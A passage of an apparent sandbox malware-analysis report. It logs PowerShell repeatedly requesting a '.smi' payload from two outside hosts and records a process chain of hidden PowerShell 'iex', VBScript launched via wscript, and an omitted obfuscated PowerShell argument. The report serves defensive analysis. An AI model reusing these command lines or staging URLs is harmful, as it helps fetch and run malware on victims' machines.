Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 17
Source IP: 192.168.2.11
Source Port: 49958
Destination IP: 184.171.244.231
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:41:03 UTC
Bytes transferred: 89
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.almrwad.com
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:41:03 UTC
Bytes transferred: 164
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Date: Thu, 05 Dec 2024 09:41:03 GMT
  Server: Apache
  Content-Length: 315
  Connection: close
  Content-Type: text/html; charset=iso-8859-1

Timestamp: 2024-12-05 09:41:03 UTC
Bytes transferred: 315
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID: 18
Source IP: 192.168.2.11
Source Port: 49971
Destination IP: 148.251.114.233
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:41:09 UTC
Bytes transferred: 98
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.erp-royal-crown.info
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:41:09 UTC
Bytes transferred: 238
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 05 Dec 2024 09:41:09 GMT
  server: LiteSpeed

Timestamp: 2024-12-05 09:41:09 UTC
Bytes transferred: 1130
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty

Timestamp: 2024-12-05 09:41:09 UTC
Bytes transferred: 121
Direction: IN
Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID: 19
Source IP: 192.168.2.11
Source Port: 49986
Destination IP: 184.171.244.231
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:41:15 UTC
Bytes transferred: 89
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.almrwad.com
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:41:15 UTC
Bytes transferred: 164
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Date: Thu, 05 Dec 2024 09:41:15 GMT
  Server: Apache
  Content-Length: 315
  Connection: close
  Content-Type: text/html; charset=iso-8859-1

Timestamp: 2024-12-05 09:41:15 UTC
Bytes transferred: 315
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID: 20
Source IP: 192.168.2.11
Source Port: 49994
Destination IP: 148.251.114.233
Destination Port: 443
PID: 832
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-12-05 09:41:21 UTC
Bytes transferred: 98
Direction: OUT
Data:
  GET /wh/Subordinerendes78.smi HTTP/1.1
  Host: www.erp-royal-crown.info
  Connection: Keep-Alive

Timestamp: 2024-12-05 09:41:21 UTC
Bytes transferred: 238
Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 05 Dec 2024 09:41:21 GMT
  server: LiteSpeed

Timestamp: 2024-12-05 09:41:21 UTC
Bytes transferred: 1130
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty

Timestamp: 2024-12-05 09:41:21 UTC
Bytes transferred: 121
Direction: IN
Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Target ID:1
                                                                            Start time:04:39:14
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1"
                                                                            Imagebase:0x7ff6eb350000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:04:39:15
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff68cce0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:04:39:17
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
                                                                            Imagebase:0x7ff6eb350000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:04:39:30
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs"
                                                                            Imagebase:0x7ff71c180000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:04:39:31
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted]
                                                                            Imagebase:0x7ff6eb350000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:04:39:31
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff68cce0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:10
                                                                            Start time:04:39:32
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                                            Imagebase:0x7ff6f3560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true
